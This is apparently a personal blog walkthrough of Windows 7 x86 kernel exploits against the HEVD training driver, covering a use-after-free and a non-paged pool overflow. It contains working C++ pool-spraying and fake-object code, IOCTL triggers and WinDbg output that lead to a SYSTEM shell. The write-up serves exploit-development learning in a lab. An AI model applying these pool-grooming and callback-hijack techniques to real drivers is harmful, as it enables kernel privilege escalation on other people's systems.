Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

defragment the pool with 10,000 objects
aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

spray the heap to get it like so ^^,
allocate our UAF object,
free our UAF object,
create our fake objects with malicious callback function pointers,
activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

The Human Machine Interface

h0mbre

22 April 2020 at 04:00

Introduction

This series will be light on tangential information such as:

how drivers work, the different types, communication between userland, the kernel, and drivers, etc
how to install HEVD,
how to set up a lab environment
shellcode analysis

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

To @r0oki7 for their walkthrough,
To @FuzzySec for their walkthrough,
and finally to @steventseeley for his walkthrough of his exploit of a Jungo driver here.

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug for this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done like the stack overflow and the integer overflow. We get a user buffer and send it to the routine which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool which are pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool which is allowed to be “paged out” when there is no more RAM capacity to a secondary storage medium.

The APIs that are relevant here in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. This API prototype looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is no vulnerability obviously; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64 which is right after the memcpy operation and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax so we can go to that location with the !pool command which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428 which is 0x8 before. This is because there is a 4 byte ULONG value and our pool tag placed before our actually buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG to being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes which we knew. The numbers that begin 0y are binary. But, you can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together and form this Ulong1 member which begins at offset 0x000. Then, from that offset, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to, was that the !pool command told us our chunk was 0x200 bytes long which makes sense when you add the size of the header 0x8 to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worth while for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

spray the pool with objects until its organically existing holes are patched with our objects,
spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next, is take our pretty pool allocations that form a large solid block, and poke holes in it the size of our kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have, is our alloaction completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not an arbitrary system process.

We will use this ability to overwrite data to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up to the kernel executing a function pointer which we will have filled with shellcode. So now our generic gameplan is:

spray the pool with objects until its organically existing holes are patched with our objects,
spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
poke some nice 0x200 byte-sized holes in the allocations,
use our driver routine to fit our kernel buffer in one of these new holes,
have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now, is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar amount of objects that FuzzySec and r0otki7 did,

10,000 to fill the holes in the fragmented pool
5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page looks like that our kernel buffer ends up being allocated on. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax don’t forget, so I just want to subtract 0x1000 from it because thats a small page size and then advance by just plugging that right in to the !pool command we get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do, is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane of and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  [email protected].....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty familiar to what we’ve done, obviously the PoolTag is different, but so is the Ulong1 value and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO which starts at offset 0x8 from the beginning of our allocation and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null)

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting as the TypeIndex value right now is set to 0xc. 0xc is actually an array index value, like array[0xc]. This array, is called the ObTypeIndexTable and it is filled with pointers which define OBJECT_TYPEs. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
